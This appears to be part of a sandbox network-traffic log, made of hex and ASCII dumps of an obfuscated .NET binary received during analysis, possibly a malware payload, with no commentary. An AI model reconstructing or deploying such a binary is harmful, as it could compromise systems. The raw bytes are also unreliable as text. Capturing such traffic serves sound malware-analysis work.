                                                                                                                                                                                                          2021-12-31 18:22:59 UTC16INData Raw: cb e0 ff ff 38 30 2a 00 00 20 39 01 00 00 38 bc e0 ff ff fe 0c 36 00 13 12 20 ab 01 00 00 28 1e 01 00 06 39 a7 e0 ff ff 26 20 91 02 00 00 38 9c e0 ff ff 11 37 11 0f 11 4d 16 91 9c 20 ad 01 00 00 38 89 e0 ff ff 11 37 11 6b 19 58 11 4d 19 91 9c 20 76 01 00 00 38 74 e0 ff ff 14 13 09 20 13 02 00 00 fe 0e 74 00 38 5f e0 ff ff 11 3e 1a 1e 12 1a 28 b0 00 00 06 26 20 6f 01 00 00 38 4d e0 ff ff 1f 28 8d 16 00 00 01 25 d0 02 01 00 04 28 1b 01 00 06 13 29 20 1b 01 00 00 38 2f e0 ff ff fe 0c 36 00 20 0a 00 00 00 fe 0c 5e 00 9c 20 93 01 00 00 38 17 e0 ff ff 7e 51 00 00 04 11 6e 11 38 6a 58 8c 11 00 00 01 11 44 8c 30 00 00 02 28 02 01 00 06 20 2a 00 00 00 28 1e 01 00 06 3a ec df ff ff 26 20 03 00 00 00 38 e1 df ff ff 20 c3 00 00 00 20 2b 00 00 00 58 fe 0e 06 00 20 7f
                                                                                                                                                                                                          Data Ascii: 80* 986 (9& 87M 87kXM v8t t8_>(& o8M(%() 8/6 ^ 8~Qn8jXD0( *(:& 8 +X
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC17INData Raw: 39 71 db ff ff 26 20 f1 00 00 00 38 66 db ff ff 11 43 73 72 00 00 0a 28 0b 01 00 06 13 34 20 75 01 00 00 38 4e db ff ff 7e 63 00 00 04 28 ef 00 00 06 16 9a 28 f0 00 00 06 13 49 20 db 01 00 00 38 31 db ff ff 20 b5 00 00 00 20 5e 00 00 00 59 fe 0e 5e 00 20 50 00 00 00 28 1e 01 00 06 39 13 db ff ff 26 20 be 00 00 00 38 08 db ff ff fe 0c 36 00 20 11 00 00 00 fe 0c 5e 00 9c 20 04 02 00 00 38 f0 da ff ff 11 4f 3a d2 1a 00 00 20 76 00 00 00 28 1f 01 00 06 39 da da ff ff 26 20 20 00 00 00 38 cf da ff ff 20 d9 00 00 00 20 61 00 00 00 59 fe 0e 59 00 20 da 00 00 00 38 b6 da ff ff 1c 8d 16 00 00 01 13 05 20 ad 00 00 00 38 a4 da ff ff 11 05 19 1f 4a 9c 20 53 00 00 00 38 94 da ff ff fe 0c 36 00 20 0f 00 00 00 20 b9 00 00 00 20 78 00 00 00 59 9c 20 59 01 00 00 38 75 da
                                                                                                                                                                                                          Data Ascii: 9q& 8fCsr(4 u8N~c((I 81 ^Y^ P(9& 86 ^ 8O: v(9& 8 aYY 8 8J S86 xY Y8u
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC19INData Raw: 06 3a 17 d6 ff ff 26 20 52 00 00 00 38 0c d6 ff ff fe 0c 6d 00 20 0a 00 00 00 fe 0c 59 00 9c 20 1f 00 00 00 38 f4 d5 ff ff 11 37 16 11 33 11 37 8e 69 28 cc 00 00 06 20 8c 02 00 00 38 dc d5 ff ff 11 37 11 6b 11 71 16 91 9c 20 3f 01 00 00 38 c9 d5 ff ff 16 13 73 20 2f 00 00 00 38 bc d5 ff ff fe 0c 36 00 20 0f 00 00 00 fe 0c 5e 00 9c 20 c7 01 00 00 fe 0e 74 00 38 9c d5 ff ff 7e 4f 00 00 04 28 10 01 00 06 28 19 01 00 06 28 1a 01 00 06 20 fc 01 00 00 38 82 d5 ff ff fe 0c 36 00 20 1f 00 00 00 20 dd 00 00 00 20 49 00 00 00 59 9c 20 d5 01 00 00 38 63 d5 ff ff 20 19 00 00 00 20 41 00 00 00 58 fe 0e 5e 00 20 3b 00 00 00 28 1e 01 00 06 39 45 d5 ff ff 26 20 60 00 00 00 38 3a d5 ff ff 1f 12 13 0f 20 70 00 00 00 38 2c d5 ff ff 16 13 1e 20 20 00 00 00 38 1f d5 ff ff 38
                                                                                                                                                                                                          Data Ascii: :& R8m Y 8737i( 87kq ?8s /86 ^ t8~O((( 86 IY 8c AX^ ;(9E& `8: p8, 88
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC20INData Raw: 16 00 00 01 e0 13 6f 20 03 00 00 00 38 2a ff ff ff dd 89 01 00 00 14 13 09 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 63 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dc 20 01 00 00 00 28 1f 01 00 06 3a 51 fd ff ff 26 20 11 00 00 00 38 46 fd ff ff 11 24 7f 61 00 00 04 28 71 00 00 0a 28 fe 00 00 06 16 1a 28 f7 00 00 06 20 03 00 00 00 28 1e 01 00 06 39 1f fd ff ff 26 20 04 00 00 00 38 14 fd ff ff 11 18 a5 14 00 00 01 80 61 00 00 04 20 09 00 00 00 38 fe fc ff ff 11 24 28 f9 00 00 06 13 3f 20 00 00 00 00 28 1e 01 00 06 39 e6 fc ff ff 26 20 06 00 00 00 38 db fc ff ff 28 d4 00 00 06 1a 40 3b fd ff ff 20 0e 00 00 00 fe 0e 45 00 38 be fc ff ff 11 24 28 d4 00 00 06 8d 16 00 00 01 16 28 d4 00 00 06 28 f7 00 00 06 20 01 00 00
                                                                                                                                                                                                          Data Ascii: o 8* (:& 8cE8 (:Q& 8F$a(q(( (9& 8a 8$(? (9& 8(@; E8$(((
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC21INData Raw: 00 06 3a 64 cb ff ff 26 20 56 00 00 00 38 59 cb ff ff 11 72 1a 11 1a 12 1a 28 b0 00 00 06 26 20 0d 00 00 00 fe 0e 74 00 38 3a cb ff ff fe 0c 36 00 20 07 00 00 00 fe 0c 5e 00 9c 20 38 02 00 00 fe 0e 74 00 38 1e cb ff ff 1f 17 13 6b 20 66 00 00 00 fe 0e 74 00 38 0c cb ff ff fe 0c 36 00 20 00 00 00 00 20 b5 00 00 00 20 69 00 00 00 59 9c 20 cc 00 00 00 38 f1 ca ff ff fe 0c 6d 00 20 00 00 00 00 fe 0c 06 00 9c 20 67 00 00 00 38 d9 ca ff ff 11 37 11 0f 1a 58 11 4d 1a 91 9c 20 01 02 00 00 38 c4 ca ff ff fe 0c 36 00 20 17 00 00 00 fe 0c 5e 00 9c 20 38 01 00 00 38 ac ca ff ff 38 c4 d5 ff ff 20 03 01 00 00 38 9d ca ff ff fe 0c 36 00 20 07 00 00 00 20 4d 00 00 00 20 70 00 00 00 58 9c 20 c8 01 00 00 38 7e ca ff ff 11 72 1a 1e 12 1a 28 b0 00 00 06 26 20 36 01 00 00 38
                                                                                                                                                                                                          Data Ascii: :d& V8Yr(& t8:6 ^ 8t8k ft86 iY 8m g87XM 86 ^ 888 86 M pX 8~r(& 68
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC23INData Raw: 00 00 38 40 00 00 00 20 00 00 00 00 28 1f 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 22 00 45 06 00 00 00 66 00 00 00 1b 00 00 00 4b 00 00 00 83 00 00 00 05 00 00 00 2e 00 00 00 38 61 00 00 00 11 57 28 e4 00 00 06 3a 55 00 00 00 20 03 00 00 00 38 c8 ff ff ff 38 63 00 00 00 20 04 00 00 00 fe 0e 22 00 38 b1 ff ff ff 16 13 5f 20 00 00 00 00 28 1e 01 00 06 39 a3 ff ff ff 26 20 01 00 00 00 38 98 ff ff ff 12 49 28 6f 00 00 0a 7e 6c 00 00 04 40 a9 ff ff ff 20 05 00 00 00 38 7d ff ff ff 11 57 28 d9 00 00 06 74 52 00 00 01 28 d0 00 00 06 13 49 20 02 00 00 00 38 60 ff ff ff dd ad 00 00 00 11 57 75 56 00 00 01 13 5c 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 03 00 00 00 38 04 00 00 00 fe 0c 3c 00 45 04 00 00 00 35 00 00 00 56 00 00 00 16
                                                                                                                                                                                                          Data Ascii: 8@ (9& 8"EfK.8aW(:U 88c "8_ (9& 8I(o~l@ 8}W(tR(I 8`WuV\ (9& 8<E5V
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC24INData Raw: 60 01 00 00 38 b0 c0 ff ff fe 0c 36 00 20 00 00 00 00 fe 0c 5e 00 9c 20 c5 00 00 00 28 1f 01 00 06 3a 93 c0 ff ff 26 20 d9 00 00 00 38 88 c0 ff ff 20 90 00 00 00 20 30 00 00 00 59 fe 0e 06 00 20 f1 00 00 00 38 6f c0 ff ff 11 75 17 1f 73 9c 20 77 00 00 00 28 1f 01 00 06 3a 5a c0 ff ff 26 20 99 02 00 00 38 4f c0 ff ff 20 1d 00 00 00 20 63 00 00 00 58 fe 0e 5e 00 20 8f 02 00 00 38 36 c0 ff ff fe 0c 36 00 20 15 00 00 00 20 15 00 00 00 20 3c 00 00 00 58 9c 20 2d 02 00 00 38 17 c0 ff ff 11 4f 8e 39 3d cc ff ff 20 6d 02 00 00 38 05 c0 ff ff 20 6b 00 00 00 20 7a 00 00 00 58 fe 0e 5e 00 20 2c 01 00 00 38 ec bf ff ff fe 0c 6d 00 20 09 00 00 00 fe 0c 06 00 9c 20 00 01 00 00 38 d4 bf ff ff 11 6a 13 6a 20 7a 00 00 00 28 1e 01 00 06 3a c1 bf ff ff 26 20 33 00 00 00 38
                                                                                                                                                                                                          Data Ascii: `86 ^ (:& 8 0Y 8ous w(:Z& 8O cX^ 866 <X -8O9= m8 k zX^ ,8m 8jj z(:& 38
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC25INData Raw: ff ff 7e 63 00 00 04 28 f1 00 00 06 28 f2 00 00 06 3a 5b 1d 00 00 20 29 00 00 00 38 40 bb ff ff 20 1f 00 00 00 20 5c 00 00 00 58 fe 0e 5e 00 20 13 00 00 00 28 1e 01 00 06 39 22 bb ff ff 26 20 18 00 00 00 38 17 bb ff ff 11 43 73 72 00 00 0a 28 d4 00 00 06 1f 40 12 1b 28 b0 00 00 06 26 20 73 00 00 00 28 1e 01 00 06 3a f2 ba ff ff 26 20 4f 00 00 00 38 e7 ba ff ff 11 53 17 58 13 53 20 c0 01 00 00 fe 0e 74 00 38 cf ba ff ff fe 0c 6d 00 20 05 00 00 00 20 2c 00 00 00 20 4d 00 00 00 58 9c 20 03 00 00 00 28 1f 01 00 06 3a af ba ff ff 26 20 03 00 00 00 38 a4 ba ff ff 1f 0c 8d 16 00 00 01 13 75 20 4b 01 00 00 38 91 ba ff ff 28 d4 00 00 06 1a 40 20 df ff ff 20 fb 01 00 00 28 1f 01 00 06 3a 77 ba ff ff 26 20 28 02 00 00 38 6c ba ff ff fe 0c 36 00 20 09 00 00 00 20 af
                                                                                                                                                                                                          Data Ascii: ~c((:[ )8@ \X^ (9"& 8Csr(@(& s(:& O8SXS t8m , MX (:& 8u K8(@ (:w& (8l6
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC27INData Raw: 00 00 20 76 00 00 00 58 fe 0e 59 00 20 5d 01 00 00 38 f1 b5 ff ff 16 13 40 20 2d 00 00 00 38 e4 b5 ff ff 11 1e 1e 62 13 1e 20 d5 00 00 00 38 d4 b5 ff ff 20 0a 00 00 00 20 03 00 00 00 58 fe 0e 5e 00 20 5f 01 00 00 38 bb b5 ff ff 20 c4 00 00 00 20 41 00 00 00 59 fe 0e 5e 00 20 82 02 00 00 38 a2 b5 ff ff 20 25 00 00 00 20 1f 00 00 00 59 fe 0e 5e 00 20 f6 00 00 00 38 89 b5 ff ff 20 d5 00 00 00 20 47 00 00 00 59 fe 0e 5e 00 20 30 01 00 00 38 70 b5 ff ff 11 6c 28 0b 01 00 06 13 43 20 06 02 00 00 38 5d b5 ff ff 11 37 11 0f 1c 58 11 4d 1c 91 9c 20 ca 01 00 00 28 1e 01 00 06 3a 43 b5 ff ff 26 20 f6 00 00 00 38 38 b5 ff ff 7e 0a 00 00 0a 13 69 20 8e 00 00 00 38 27 b5 ff ff 28 d3 00 00 06 20 af 00 00 00 38 18 b5 ff ff 16 13 5f 20 a4 01 00 00 28 1f 01 00 06 3a 06 b5
                                                                                                                                                                                                          Data Ascii: vXY ]8@ -8b 8 X^ _8 AY^ 8 % Y^ 8 GY^ 08pl(C 8]7XM (:C& 88~i 8'( 8_ (:
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC28INData Raw: 20 09 00 00 00 38 99 fe ff ff 17 80 59 00 00 04 20 04 00 00 00 fe 0e 0e 00 38 81 fe ff ff 38 be fe ff ff 20 05 00 00 00 28 1f 01 00 06 39 71 fe ff ff 26 20 02 00 00 00 38 66 fe ff ff dd a6 02 00 00 20 02 00 00 00 38 57 fe ff ff 11 57 28 d9 00 00 06 74 52 00 00 01 13 4e 20 0a 00 00 00 38 3f fe ff ff dd 7f 02 00 00 11 57 75 56 00 00 01 13 5c 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 56 00 00 00 16 00 00 00 35 00 00 00 38 00 00 00 00 11 5c 3a 29 00 00 00 20 02 00 00 00 38 d5 ff ff ff 38 3b 00 00 00 20 03 00 00 00 28 1e 01 00 06 3a c1 ff ff ff 26 20 00 00 00 00 38 b6 ff ff ff 11 5c 28 e5 00 00 06 20 01 00 00 00 28 1f 01 00 06 3a a0 ff ff ff 26 20 01 00 00 00 38 95 ff ff ff dc 20 19 00
                                                                                                                                                                                                          Data Ascii: 8Y 88 (9q& 8f 8WW(tRN 8?WuV\ (:& 8(EV58\:) 88; (:& 8\( (:& 8
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC29INData Raw: ab ff ff fe 0c 36 00 20 18 00 00 00 fe 0c 5e 00 9c 20 68 00 00 00 28 1e 01 00 06 3a 35 ab ff ff 26 20 5e 00 00 00 38 2a ab ff ff 11 37 11 0f 1d 58 11 4d 1d 91 9c 20 5c 01 00 00 38 15 ab ff ff fe 0c 6d 00 20 01 00 00 00 20 3f 00 00 00 20 4c 00 00 00 58 9c 20 ff 00 00 00 fe 0e 74 00 38 ee aa ff ff 16 13 13 20 f7 01 00 00 28 1f 01 00 06 39 e0 aa ff ff 26 20 29 00 00 00 38 d5 aa ff ff fe 0c 36 00 20 0d 00 00 00 fe 0c 5e 00 9c 20 a6 00 00 00 fe 0e 74 00 38 b5 aa ff ff 20 85 00 00 00 20 15 00 00 00 59 fe 0e 5e 00 20 e6 00 00 00 38 a0 aa ff ff 20 fe 00 00 00 20 54 00 00 00 59 fe 0e 5e 00 20 33 01 00 00 38 87 aa ff ff fe 0c 6d 00 20 0b 00 00 00 fe 0c 59 00 9c 20 65 00 00 00 28 1e 01 00 06 3a 6a aa ff ff 26 20 44 00 00 00 38 5f aa ff ff 20 74 00 00 00 20 6a 00 00
                                                                                                                                                                                                          Data Ascii: 6 ^ h(:5& ^8*7XM \8m ? LX t8 (9& )86 ^ t8 Y^ 8 TY^ 38m Y e(:j& D8_ t j
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC31INData Raw: 01 00 00 38 f4 a5 ff ff 11 26 13 27 20 6b 01 00 00 38 e6 a5 ff ff 11 05 16 1f 67 9c 20 12 01 00 00 28 1f 01 00 06 39 d1 a5 ff ff 26 20 42 00 00 00 38 c6 a5 ff ff fe 0c 6d 00 20 06 00 00 00 fe 0c 59 00 9c 20 63 02 00 00 28 1e 01 00 06 3a a9 a5 ff ff 26 20 1d 00 00 00 38 9e a5 ff ff 11 50 28 f3 00 00 06 13 77 20 b1 00 00 00 28 1f 01 00 06 3a 86 a5 ff ff 26 20 ed 00 00 00 38 7b a5 ff ff 38 c0 ca ff ff 20 74 02 00 00 38 6c a5 ff ff fe 0c 36 00 20 1b 00 00 00 20 68 00 00 00 20 41 00 00 00 58 9c 20 5d 02 00 00 38 4d a5 ff ff 11 42 1e 62 13 42 20 8d 02 00 00 38 3d a5 ff ff 20 a4 00 00 00 20 36 00 00 00 59 fe 0e 06 00 20 12 02 00 00 28 1e 01 00 06 3a 1f a5 ff ff 26 20 e0 00 00 00 38 14 a5 ff ff 20 1d 00 00 00 20 2e 00 00 00 58 fe 0e 5e 00 20 72 02 00 00 28 1e 01
                                                                                                                                                                                                          Data Ascii: 8&' k8g (9& B8m Y c(:& 8P(w (:& 8{8 t8l6 h AX ]8MBbB 8= 6Y (:& 8 .X^ r(
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC32INData Raw: 00 06 3a 9c a0 ff ff 26 20 88 00 00 00 38 91 a0 ff ff 38 fd c3 ff ff 20 64 00 00 00 38 82 a0 ff ff 14 13 4d 20 4a 00 00 00 38 75 a0 ff ff 11 75 19 1f 6f 9c 20 84 02 00 00 38 65 a0 ff ff 11 75 1f 09 1f 64 9c 20 a1 00 00 00 28 1f 01 00 06 3a 4f a0 ff ff 26 20 c3 00 00 00 38 44 a0 ff ff 11 12 11 53 11 12 11 53 91 11 47 11 53 91 61 d2 9c 20 34 02 00 00 28 1e 01 00 06 3a 24 a0 ff ff 26 20 45 00 00 00 38 19 a0 ff ff 11 3d 8e 69 1e 5b 13 10 20 f7 01 00 00 28 1e 01 00 06 39 02 a0 ff ff 26 20 5e 02 00 00 38 f7 9f ff ff fe 0c 36 00 20 1a 00 00 00 fe 0c 5e 00 9c 20 8e 00 00 00 28 1f 01 00 06 3a da 9f ff ff 26 20 e0 00 00 00 38 cf 9f ff ff 20 f4 f3 f2 f1 13 08 20 b4 00 00 00 28 1f 01 00 06 3a b9 9f ff ff 26 20 59 02 00 00 38 ae 9f ff ff 28 ce 00 00 06 13 55 20 a7 01
                                                                                                                                                                                                          Data Ascii: :& 88 d8M J8uuo 8eud (:O& 8DSSGSa 4(:$& E8=i[ (9& ^86 ^ (:& 8 (:& Y8(U
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC33INData Raw: 65 00 5a fe 0c 35 00 59 fe 0e 65 00 20 f0 a5 7c b0 6a fe 0e 25 00 fe 0c 25 00 16 6a 40 0b 00 00 00 fe 0c 25 00 17 6a 59 fe 0e 25 00 fe 0c 35 00 fe 0c 35 00 5a 6e fe 0c 25 00 5e 6d fe 0e 35 00 20 df 12 b0 54 fe 0c 2d 00 61 fe 0e 65 00 20 3f 43 06 00 fe 0c 35 00 20 ff 0f 00 00 5f 5a fe 0c 35 00 1f 0c 64 58 fe 0e 35 00 20 82 25 07 00 fe 0c 2d 00 20 ff 0f 00 00 5f 5a fe 0c 2d 00 1f 0c 64 59 fe 0e 2d 00 20 76 c2 00 00 fe 0c 2d 00 5a fe 0c 35 00 59 fe 0e 2d 00 fe 0c 2d 00 fe 0c 2d 00 fe 0c 2d 00 59 61 fe 0e 66 00 fe 0c 3b 00 fe 0c 3b 00 1f 19 62 61 fe 0e 3b 00 fe 0c 3b 00 fe 0c 65 00 58 fe 0e 3b 00 fe 0c 3b 00 fe 0c 3b 00 1d 62 61 fe 0e 3b 00 fe 0c 3b 00 fe 0c 1d 00 58 fe 0e 3b 00 fe 0c 3b 00 fe 0c 3b 00 1f 0d 64 61 fe 0e 3b 00 fe 0c 3b 00 fe 0c 66 00 58 fe 0e
                                                                                                                                                                                                          Data Ascii: eZ5Ye |j%%j@%jY%55Zn%^m5 T-ae ?C5 _Z5dX5 %- _Z-dY- v-Z5Y----Yaf;;ba;;eX;;;ba;;X;;;da;;fX
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC34INData Raw: 00 00 02 80 54 00 00 04 7e 54 00 00 04 02 6f 5c 01 00 06 2a 00 00 00 e2 7e 5e 00 00 04 7e 0a 00 00 0a 28 83 00 00 0a 39 1e 00 00 00 72 75 11 00 70 28 62 00 00 0a 72 85 11 00 70 28 80 00 00 0a 28 ab 00 00 06 80 5e 00 00 04 7e 5e 00 00 04 2a 00 00 00 1b 30 05 00 50 00 00 00 14 00 00 11 02 19 17 17 73 84 00 00 0a 0b 16 0c 07 6f 3d 00 00 0a 69 0d 09 8d 16 00 00 01 0a 38 15 00 00 00 07 06 08 09 6f 34 00 00 0a 13 04 08 11 04 58 0c 09 11 04 59 0d 09 16 3d e4 ff ff ff dd 0d 00 00 00 07 39 06 00 00 00 07 6f 85 00 00 0a dc 06 2a 01 10 00 00 02 00 0a 00 37 41 00 0d 00 00 00 00 1a 73 77 00 00 0a 2a 00 32 02 74 29 00 00 01 6f 86 00 00 0a 2a 00 00 00 13 30 06 00 65 00 00 00 15 00 00 11 28 b5 00 00 06 0a 28 9a 00 00 06 0b 07 1f 20 8d 16 00 00 01 25 d0 03 01 00 04 28 25
                                                                                                                                                                                                          Data Ascii: T~To\*~^~(9rup(brp((^~^*0Pso=i8o4XY=9o*7Asw*2t)o*0e(( %(%
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC36INData Raw: 85 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 3b 00 00 0a 2a 00 2a fe 09 00 00 6f 3b 01 00 06 2a 00 3a fe 09 00 00 fe 09 01 00 6f 37 00 00 0a 2a 00 2a fe 09 00 00 6f 3d 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 3c 01 00 06 2a 00 2e 00 fe 09 00 00 28 a5 00 00 0a 2a 2a fe 09 00 00 6f 7b 00 00 0a 2a 00 2a fe 09 00 00 6f a6 00 00 0a 2a 00 4e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 28 a7 00 00 0a 2a 2a fe 09 00 00 6f a8 00 00 0a 2a 00 2e 00 fe 09 00 00 28 a9 00 00 0a 2a 2a fe 09 00 00 6f 79 00 00 0a 2a 00 2a fe 09 00 00 6f 61 00 00 0a 2a 00 2a fe 09 00 00 6f 3e 01 00 06 2a 00 1e 00 28 9a 00 00 06 2a 3a fe 09 00 00 fe 09 01 00 6f aa 00 00 0a 2a 00 4a fe 09 00 00 fe 09 01 00 fe 09 02 00 6f ab 00 00 0a 2a 00 5a fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00
                                                                                                                                                                                                          Data Ascii: *:o;**o;*:o7**o=*:o<*.(**o{**o*N(**o*.(**oy**oa**o>*(*:o*Jo*Z
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC37INData Raw: 04 22 00 00 1e 10 00 00 03 2d 00 00 c8 12 00 00 e6 19 00 00 d7 04 00 00 8a 20 00 00 1a 23 00 00 60 14 00 00 9e 10 00 00 f3 1b 00 00 19 18 00 00 e9 0f 00 00 e6 21 00 00 7b 0c 00 00 02 0c 00 00 b0 24 00 00 f9 2f 00 00 f3 18 00 00 44 1c 00 00 32 11 00 00 cc 0d 00 00 7a 2d 00 00 fa 0e 00 00 04 1e 00 00 1d 00 00 00 1a 29 00 00 fb 1f 00 00 f0 2d 00 00 db 17 00 00 b5 18 00 00 cc 2a 00 00 59 02 00 00 21 14 00 00 a9 19 00 00 74 12 00 00 78 20 00 00 e1 05 00 00 a9 31 00 00 d8 26 00 00 91 00 00 00 28 02 00 00 e1 12 00 00 e2 0e 00 00 b2 00 00 00 19 0f 00 00 62 0c 00 00 b5 23 00 00 b2 05 00 00 ed 03 00 00 65 1b 00 00 aa 06 00 00 d7 09 00 00 00 16 00 00 dc 27 00 00 69 26 00 00 3e 12 00 00 b9 0a 00 00 20 24 00 00 00 2f 00 00 0f 15 00 00 77 2c 00 00 89 16 00 00 33 1e 00
                                                                                                                                                                                                          Data Ascii: "- #`!{$/D2z-)-*Y!tx 1&(b#e'i&> $/w,3
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC39INData Raw: 21 00 00 89 1c 00 00 86 18 00 00 f8 1a 00 00 4d 25 00 00 db 22 00 00 9c 30 00 00 e7 2c 00 00 41 1d 00 00 7e 24 00 00 b1 1a 00 00 cb 20 00 00 4c 04 00 00 4f 24 00 00 2b 10 00 00 7a 19 00 00 d8 2b 00 00 99 2d 00 00 b0 07 00 00 50 26 00 00 fa 12 00 00 38 4a 22 00 00 fe 0c 01 00 20 0f 00 00 00 fe 0c 14 00 9c 20 9c 01 00 00 38 4a f9 ff ff fe 0c 01 00 20 02 00 00 00 fe 0c 1c 00 9c 20 98 00 00 00 28 76 01 00 06 3a 2d f9 ff ff 26 20 31 01 00 00 38 22 f9 ff ff fe 0c 01 00 20 05 00 00 00 20 5f 00 00 00 20 29 00 00 00 59 9c 20 b7 00 00 00 fe 0e 1f 00 38 fb f8 ff ff fe 0c 0d 00 20 16 00 00 00 fe 0c 10 00 9c 20 60 01 00 00 38 e7 f8 ff ff 11 25 11 08 61 13 26 20 84 00 00 00 38 d6 f8 ff ff 73 77 00 00 0a 13 21 20 2b 01 00 00 28 75 01 00 06 3a c0 f8 ff ff 26 20 25 00 00
                                                                                                                                                                                                          Data Ascii: !M%"0,A~$ LO$+z+-P&8J" 8J (v:-& 18" _ )Y 8 `8%a& 8sw! +(u:& %
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC40INData Raw: ff ff 20 28 00 00 00 20 3b 00 00 00 58 fe 0e 1c 00 20 26 01 00 00 28 76 01 00 06 39 41 f4 ff ff 26 20 ae 00 00 00 38 36 f4 ff ff fe 0c 0d 00 20 0f 00 00 00 fe 0c 18 00 9c 20 5d 00 00 00 28 76 01 00 06 3a 19 f4 ff ff 26 20 8d 00 00 00 38 0e f4 ff ff fe 0c 0d 00 20 11 00 00 00 fe 0c 18 00 9c 20 a8 00 00 00 38 f6 f3 ff ff fe 0c 01 00 20 00 00 00 00 fe 0c 1c 00 9c 20 a8 00 00 00 28 76 01 00 06 3a d9 f3 ff ff 26 20 fd 00 00 00 38 ce f3 ff ff 20 f1 00 00 00 20 50 00 00 00 59 fe 0e 18 00 20 15 00 00 00 38 b5 f3 ff ff fe 0c 0d 00 20 02 00 00 00 20 da 00 00 00 20 48 00 00 00 59 9c 20 30 00 00 00 28 76 01 00 06 3a 91 f3 ff ff 26 20 88 00 00 00 38 86 f3 ff ff 20 1e 00 00 00 20 16 00 00 00 58 fe 0e 10 00 20 a6 00 00 00 38 6d f3 ff ff 20 a9 00 00 00 20 38 00 00 00 59
                                                                                                                                                                                                          Data Ascii: ( ;X &(v9A& 86 ](v:& 8 8 (v:& 8 PY 8 HY 0(v:& 8 X 8m 8Y
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC41INData Raw: 39 03 ef ff ff 26 20 77 00 00 00 38 f8 ee ff ff 11 20 16 3e 6f 17 00 00 20 03 00 00 00 38 e6 ee ff ff 20 f1 00 00 00 20 50 00 00 00 59 fe 0e 18 00 20 66 01 00 00 38 cd ee ff ff fe 0c 0d 00 20 13 00 00 00 20 ac 00 00 00 20 39 00 00 00 59 9c 20 7a 00 00 00 38 ae ee ff ff fe 0c 01 00 20 08 00 00 00 fe 0c 1c 00 9c 20 2b 00 00 00 28 76 01 00 06 3a 91 ee ff ff 26 20 42 00 00 00 38 86 ee ff ff fe 0c 01 00 20 09 00 00 00 20 ac 00 00 00 20 39 00 00 00 59 9c 20 1d 00 00 00 28 76 01 00 06 3a 62 ee ff ff 26 20 60 00 00 00 38 57 ee ff ff fe 0c 0d 00 20 13 00 00 00 fe 0c 18 00 9c 20 b3 00 00 00 28 75 01 00 06 3a 3a ee ff ff 26 20 3c 00 00 00 38 2f ee ff ff fe 0c 01 00 20 06 00 00 00 fe 0c 14 00 9c 20 11 00 00 00 38 17 ee ff ff 16 13 19 20 2e 00 00 00 28 76 01 00 06 3a
                                                                                                                                                                                                          Data Ascii: 9& w8 >o 8 PY f8 9Y z8 +(v:& B8 9Y (v:b& `8W (u::& <8/ 8 .(v:
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC43INData Raw: 38 00 00 00 00 11 0a 28 70 01 00 06 20 00 00 00 00 28 76 01 00 06 3a d8 ff ff ff 26 20 01 00 00 00 38 cd ff ff ff dc 20 35 01 00 00 38 7e e9 ff ff fe 0c 0d 00 20 1c 00 00 00 fe 0c 18 00 9c 20 70 00 00 00 38 66 e9 ff ff 20 bb 00 00 00 20 3e 00 00 00 59 fe 0e 10 00 20 a2 00 00 00 fe 0e 1f 00 38 45 e9 ff ff 16 13 05 20 19 01 00 00 38 3c e9 ff ff 20 a5 00 00 00 20 37 00 00 00 59 fe 0e 10 00 20 2f 00 00 00 28 75 01 00 06 3a 1e e9 ff ff 26 20 0a 00 00 00 38 13 e9 ff ff 11 05 11 12 5d 13 13 20 17 00 00 00 28 76 01 00 06 3a fd e8 ff ff 26 20 00 01 00 00 38 f2 e8 ff ff 20 e2 00 00 00 20 4b 00 00 00 59 fe 0e 10 00 20 00 00 00 00 28 75 01 00 06 39 d4 e8 ff ff 26 20 02 00 00 00 38 c9 e8 ff ff fe 0c 0d 00 20 08 00 00 00 20 b8 00 00 00 20 43 00 00 00 59 9c 20 45 00 00
                                                                                                                                                                                                          Data Ascii: 8(p (v:& 8 58~ p8f >Y 8E 8< 7Y /(u:& 8] (v:& 8 KY (u9& 8 CY E
